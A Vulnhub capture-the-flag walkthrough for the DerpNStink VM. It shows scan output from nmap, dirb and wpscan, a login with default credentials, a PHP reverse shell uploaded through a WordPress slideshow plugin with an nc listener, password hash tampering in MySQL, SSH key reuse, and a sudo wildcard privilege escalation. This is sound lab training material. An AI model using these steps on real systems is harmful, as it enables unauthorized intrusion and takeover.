DerpNStink

DerpNStink Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/DNS 192.168.1.116

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 04:37 EDT
Nmap scan report for 192.168.1.116
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:7D:91:B5 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds

Let's put the IP to the web browser

If we go to inspect element and open up all div we can get the first flag

Dirb

dirb http://192.168.1.116/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 25 04:50:28 2020
URL_BASE: http://192.168.1.116/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.116/ ----
==> DIRECTORY: http://192.168.1.116/css/                                                                                              
+ http://192.168.1.116/index.html (CODE:200|SIZE:1298)                                                                                
==> DIRECTORY: http://192.168.1.116/javascript/                                                                                       
==> DIRECTORY: http://192.168.1.116/js/                                                                                               
==> DIRECTORY: http://192.168.1.116/php/                                                                                              
+ http://192.168.1.116/robots.txt (CODE:200|SIZE:53)                                                                                  
+ http://192.168.1.116/server-status (CODE:403|SIZE:293)                                                                              
==> DIRECTORY: http://192.168.1.116/temporary/                                                                                        
==> DIRECTORY: http://192.168.1.116/weblog/   

We can see at the nmap and dirb scan has robots.txt, lets navigate to there

As we can see, we don't have permission on /php and /temporary told us to try harder.

We also can see a /weblog in the dirb scan. After navigating to there I got an error

I navigate to /etc/hosts and add a IP at there

After that refresh the page and we can see a WordPress Blog

Wpscan

wpscan --url http://derpnstink.local/weblog/ --enumerate u,ap --plugins-detection aggressive

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://derpnstink.local/weblog/ [192.168.1.116]
[+] Started: Mon May 25 04:55:03 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.7 (Ubuntu)
 |  - X-Powered-By: PHP/5.5.9-1ubuntu4.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://derpnstink.local/weblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://derpnstink.local/weblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://derpnstink.local/weblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.6.18 identified (Latest, released on 2020-04-29).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: '-release.min.js?ver=4.6.18'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.18'

[+] WordPress theme in use: twentysixteen
 | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:02:19 <===================================================> (86907 / 86907) 100.00% Time: 00:02:19
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://derpnstink.local/weblog/wp-content/plugins/akismet/
 | Last Updated: 2020-04-29T13:02:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 4.1.5
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/, status: 200
 |
 | Version: 3.1.11 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt

[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2019-07-12T13:09:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | [!] The version is out of date, the latest version is 1.6.12
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/, status: 403
 |
 | Version: 1.4.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] unclestinky
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon May 25 04:57:36 2020
[+] Requests Done: 86966
[+] Cached Requests: 12
[+] Data Sent: 22.571 MB
[+] Data Received: 11.789 MB
[+] Memory used: 368.992 MB
[+] Elapsed time: 00:02:33

We got 2 plugins and 2 usernames, for the first try, I managed to log in using the username admin and password admin

After clicking around, I found out that under manage slides we can edit the slideshow and bottom we can see that we can upload image. So, I decided to upload a shell file.

Exploitation

Reverse Shell

Go to this page and download the php reverse shell file from pentestmonkey

Change the IP and the port to our machine then we need to set up a listener

nc -nlvp 4444

Then we can go to Manage Slides

And I click randonx to edit

Scroll to the bottom we can see this

Upload the reverse shell file.

Then go back to the /weblog

Click the right arrow on the slides until you get a reverse shell!

And then we can type

python -c 'import pty; pty.spawn("/bin/bash")'

When I run linpeas.sh, I found mysql username and password.

Then we can go /php/myphpadmin to log into the MySQL database

Then go to wordpress database and go to wp_users

I found out that the hash is too difficult to crack because of hash, make it easy, I copy the admin hash to replace the unclestinky hash

Then we can login into the wordpress again

Go to the post, and we will find the second flag.

We then go back to the database and go to mysql database and go to user table.

Then we can take unclestinky password to crack it at here

We got the password wedgie57

We then can ssh to the user stinky

Then I went to the Desktop folder and I found the third flag!

After that, I went to the /home directory, I found out 1 ftp folder

Then, there is a bunch of ssh files inside over each other

After 7 times of changing directory, we got key.txt

It contains RSA private key

This might a clue on ssh to the user stinky

We save the RSA txt to a file called id_rsa and put it at /root/.ssh

We can see that the id_rsa is too open so we need to change the permission

type chmod 700 id_rsa

Then we can ssh into it

ssh -i /root/.ssh/id_rsa stinky@192.168.1.116

Then navigate to /home/Stinky/Documents we can get a pcap file

Transfer it using nc to our machine

Then analyse the file using wireshark

Then we can follow the TCP stream and this is the password for user mrderp.

we then su to user mrderp

Then type sudo -l

Privilege Escalation

We can see that inside the /home/mrderp we don't have the folder called binaries.

So we need to create one

mkdir binaries
cd binaries
echo "/bin/bash" > derpy.sh
chmod 777 derpy.sh
sudo /home/mrderp/derpy*

Got root !

Navigate to the /root/Desktop to get the fourth flag